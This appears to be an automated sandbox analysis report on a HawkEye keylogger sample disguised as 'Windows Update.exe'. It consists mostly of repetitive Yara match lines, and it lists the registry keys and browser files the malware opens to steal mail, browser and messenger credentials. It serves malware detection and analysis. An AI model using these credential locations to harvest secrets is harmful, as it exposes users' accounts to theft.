          Source: Yara matchFile source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.415513797.0000000005980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 5.exe PID: 1928, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 5.exe PID: 1060, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5844, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 6244, type: MEMORYSTR
          Tries to steal Mail credentials (via file / registry access)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Tries to steal Mail credentials (via file registry)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword15_2_00402D9A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword15_2_00402D9A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword15_2_004033D7
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Yara detected WebBrowserPassView password recovery toolShow sources
          Source: Yara matchFile source: 10.0.Windows Update.exe.38cb065.46.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b29c0d.17.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b9265.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.41ce65.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38cb065.46.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.34.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.29.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.53.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b9265.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.17.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a57e0d.13.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.41ce65.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.386b065.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.41ce65.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.57.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.49.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae9c0d.19.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38cb065.24.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.49d0e2d.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.42.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.34.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38cb065.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.53.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.11.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41ce65.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41ce65.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.26.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a07e2d.10.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a97e0d.11.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000000.331916237.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 5.exe PID: 1928, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 5.exe PID: 1060, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5844, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 6244, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6736, type: MEMORYSTR
          Tries to steal Instant Messenger accounts or passwordsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior

          Remote Access Functionality:

          barindex
          Yara detected HawkEye KeyloggerShow sources
          Source: Yara matchFile source: 10.0.Windows Update.exe.4b3fa72.56.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a5dc92.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b28208.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.52.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4aadc72.51.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.415058.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.47.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.39.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.41ce65.0.raw.unpack, type: UNPACKEDPE
